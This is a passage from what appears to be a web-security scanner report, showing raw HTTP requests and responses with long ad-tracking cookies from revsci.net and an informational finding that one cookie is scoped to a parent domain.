NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_FjqN="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJjPoqAsRpDY+d3CfwKDuu/qqVldUdsHqMnTyr8hravoDnGDoK1JbvpTFv9DuubBt/bmQjpkEkL0yVoSRMqdmIKsKUJBBt5fjnlpRQK7VdUk5qoO8+OIp6+c/TEkvIZDxo2xIZ3Re83oElrmlKq5dS1Wo0HtZTYe6Ma3XpWm1VTCbW1cX+65KnUf5osgEWiOVQEpMhBq8XZJafZK5wwYqgOMnJSzRQs9xnwqjYgVG3mlG7GBvD3y3psFLR3EKKCoGXw1v7IFra+w/httLDRIjpJFWAdeDCy0hy6jD+f3BeCatSG4Be1ys2sLBg4n+AtnjpPaVsXFECjGFijsYCAvLYsFrEidhNE3biAvrtHcKDONQDwPtq51BrsO28u2g9s9zqeX+BG/9YsWFlb6NI2eb7S/SHrwja3o39Ot9xgOnxwHfDB4xe2kZMsZ/PKyEe3wh/7YUpgdWf1QcVj3tQGZeoIiCEQmgTarNSGWqkEQH8eex3H+lzReSJ+1BpZ1tOb9S97EYmd5NDhrPBYn2YP2W4z2RwdgRsHnclNNtDBIWjLJ/XjYhHIEa0WtfrwS0QH27MfoqoNj35yGiovVaHePlwbrxm+m5MufLTBCj5U5bePYcrysaP1GH14+k3Rr/H7U2Ev+xvLo/HPPndnVNRTwCnC1YEvRmE6L94lNUnIvqRadceHBVQDwUlegLabVWP7yVLfYU+qS2u63/9ZEcET6idOD8iq7C0oydbUXJWm5u5aFFmINi0cnISExZaSepPCnpKP4RzDHI2/xuPFeAs/3wH7xwWB980NtcTCqDUliECjAHB1WSzbK9Q9SC09+9U3RLyaHba2Hf7EfHuFKOMavVImVv191/K1MDeYbPu4686Pu3GPBRXNjwcVhLnbnpLS0FGXnH+R/nwEC8fnsxmCYoyOsDQuwKc5mWD4UzdSXPU8QZD22dUjczysauMwd3mlMrw+g99FUf8zDx7QAweezuJh4EBi0jRlxicwOnCJ2O1dI1/gai49yN7WiIGfbhLWZmb29AqkTRonUqKwaLe6yFWCWd2+kMvXlSUEX5pW2t7YtJsuBvzTQKq9zWArWbBLZ6uq+eIKwbrwUYUnGflCu/4ggnOnhm1oCkX4ZR09MiA4s4DGjY+RAY+M3top4ah0Jy49yJFnJ6u9cL7JsfxYq8bXLtLxxRoACUOsP4bY+4VCqsMQsTfUKB33044PmqSUWkmea5goFrXAZb92RDLmAkfCWnhl76jjDtpFGV1oeAV2Q+s861FcNnELtQlwZPJMDTA2LPyQM3Uau+K/3oCX2oeP31fbD5fj"; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7Nel40QcHuDIduu0zKlUsklfgiYlFit6AAqjveFbUIGA8zUgndkNxd5IyfhVPx5xIzwDSm0V+yA+NhuRDhy5i+gvINTYQsI1WQhiC6XjgPQ3Df5nrzydLVanSZrVdRM3t/HxCjzxqvcKP4dHUu8uyDMcdTuykAQyOHNPHm57AwO8H8G0RPLYq1UIFndUmRMMRXEL2pAYPAaaRI6yHMLUK1e5WVLHflqqGFhtnn1W2Xqj6rApiY+NV5GEBdpzIpA/boGN4NDwSF2gVO+S27AZ/sCo+iW8cyHj79oUDABTdpb5ch1efWnc1B5EgxmFKfdAKvtDLQ29mkG4JbhsIZOgOliSexmlJUyRyz82/sUf78kddga87LY72UURB3eKVFMnn47WZ9rG3a7+1gJf3/g0qH5Zhll8j/owmsGbAp1Ta5Z45JJ/FFJQsHUCwMiDzm6db/PtV5S+0QP3EMYP07nnhHeql362V+LtlE4dYkgzZSllQ7tCIBC4ddIg2INLRT6E/KsNQlcS18iCe+rQJSwBta5j9NlslofhNFN2RJfn5g+35B46DhIx84kKwEpFuhXrqDS80zX1yDcPkviolhD05YuQlNzWPlPFoB9PyDGuPtb4JptgptvEvAVSC0fxlUhH7A7EPtcdH3GBYv5f5/aBj7G3j+pDTkNeo1gb/r3cKbHVKQX5lAZJRFWsZ2hYItyQcOQyO1Gc7yqQhak2BvTzl14aTJt/Mqwuqh77dLWUIJlJDRu/MY3Skg5D8Y5H9LuTPCwZHz0SwtobdyEqc9WCzaS9smQx8H9OOFv91ERMhKOlrKU5UHliLV6ssqMnTKjh+VedNZLD09u2y8gU84PrKmblnQBxRQmfg3RWQ8AMgzXLM5Ff6BMY11o8ZRuB6rDMeBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCO8IV2mwp0R+xi0lSfmOSsobQut40tp2Td+t/K1aVk+0+FodzML1pnpAwAiyhfQ6O6CbHt0wF9h/DatbZ942O9elD0Rmp9LU0ituiKtAnHfE5Onmr4vZpE8JktVfnrmUsZ7xW2laqbePcrRuqAtvaTY6U5TXobYVSoksigUlUhCbpUR9wQXabnmqAjbePAkvcez2mux4x9B95wN2N+5OYM8N7+UB8QvYSnQIaAsSjRBlzQiwU2O/8JkIVVAc2VwPPfC0h4pdhLFSqL+Fz7B8HeW6gk2WMVQ5FcPo+1ID4w764iXQ/zHptal55R3wIxyjmsw/TWF7RDs7W6jl9uF0AWB8zXPPithOMs9ok5djdTAeE46K8Fu/UG5X+jC0WXdFauwPpSZ0u7KXi2fHevIO/uYijDJqLIvaRmn3De08hknUPU/PG4vMioNw4nbCIvSnQNj3bpDU/NRPxJTvmRi0xGBcgazZHHhsrW0aQfja6MbypzvmQWXXsMgCXcM9qdcWCmCMThAM8wYIyHEciOHcYMP8181NgmEfoovflK3QEr/94glwixB8mAR8HTbXIM0pOiIcMmSCYvnULt1lKExtZrj2wu2zX716ONgCpL3+WEnAYsWo1XL+XBx73LwwZeymku5JzPMIThY4A4B4zN0DlGnriJfYjFXbmLQEHQz5X6jVji7Mn83OKqYp3D6gt0bZKJyLd67rBHsR3LuoQDN8OBmg7X3jhhyCn1sMKsX+nBaabnwAO4hpyhhLM/Tv9kyp8VSnWh6d1Xu73HwAwpWhHzcLLO9Dmpg3354R9pN9pZoQ4g=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLt+Jj4m8aYFMryjeoi0TlzQ7R2IFcY8A30Ro53whtEoiH/Bu+WvCryZgtVikCSLPEeifdrCBZbLvKqIu+csveC9Xvf9d5VgUHFOWSjk0wT5Gkq6w5xqk/1aGiVp/rFuGh27GkpR+EliPHK1f2TWLYL1sXbC6eUwGWzUNsS8f4urLm2iUv1hCiOqDYuCA+YOB3u+NuABggAS5kmHVELSWX4cloNZjgJZMm0hekaZh4U8yWjZaCJ0LnGs8fpot2njPjrwmEbQIHtgVoUKSF624Xi79TjLbQNJBR63X2lVRIMpRoS1Bc87QYOL2YvEwMhtqkHc38XcmxgnvPL+W7YhTdSJWQMP4bJ8FJ9Ef9othIGvTCJ4Ba9LWbtR7+G0nltH3yy2K+/mE8hwj7G6k3Go2+sbq4XB6lERNTZXxjcBtrDDCZ91Tvim6sbyKU/GLRkH8LU6uup53dn4w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcLNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewu3QAx3uKzb2aFbWjI69eif+fODfjX2iW0zQnr2ApwL/IaWQAWmnFp61mTBgWbeLLplHNs08LFzYabwcAaYOpnwILBLA0IVDPkkGA4cG8987iuBlXl4yixD++rOGTsZv2eIAi6/tStrKkyKC/JXks5vOAC9GNAaNN9SIPSSgIVwuLxxEDZFtogZob6stUpVF0bF5RnkJXewaqSRMWqhntmKPHS7fwBMYESD1jsZuIh+afeGY/a+MmkAbSj6BxvAnX3PBxUJB08WfZWzRHSxSjL0s1nQn1aBhcdXO7MEbvH29Jbh9pz9psldaXNjS8nNO0nRaEioGGyf0mdW2GmFF3uqepO/hUq5hXY+RVEvbn1mH27KkDH58TGmNbI6JzmG3Q6GGoKtfyZ40FhOEsB1ykXVT/0VlHeufK0QtN+TBo1efXnXmzm8dtxJLmJeO0ZLOHVbzTTtO16Tur2LMvMzRS+5ImgOMLPdOW9Wn/gqImudjUr0507hjojcVEeBpMjdx1AfR/zyoc3NAePEy2cUAH4tO2pCz/7zt3aok6y67TthGh+zGb8FwVSP4OwJX4zAkzKYNj3o3tUIP6c5evz0uNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:14:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:14:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.201. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/85990292.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQX1dfcmxcf0Wvq23q+MT2iJYg/xrxzjNp79VYSobSVOD7WX/S9Z8O4BnUHBiqvRIkPnhSUmUe6IqBE7GhEwMzNJJcuu2seC5Iq2xH7Qywe+4DJyaRxTw/mss73j5pLn5ZanpEu8QCmuhtkv8oye8PJyXzHyFFqvQHvEUUW1Bd8WQ4/TVd06R1uszI4TYM73mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTu+7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSn4RE/BtirGw5welW2A2Iz0fGzTVF72idj9hrLuiklOHPB6nyU9du/DMNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:54:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/85990292.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3s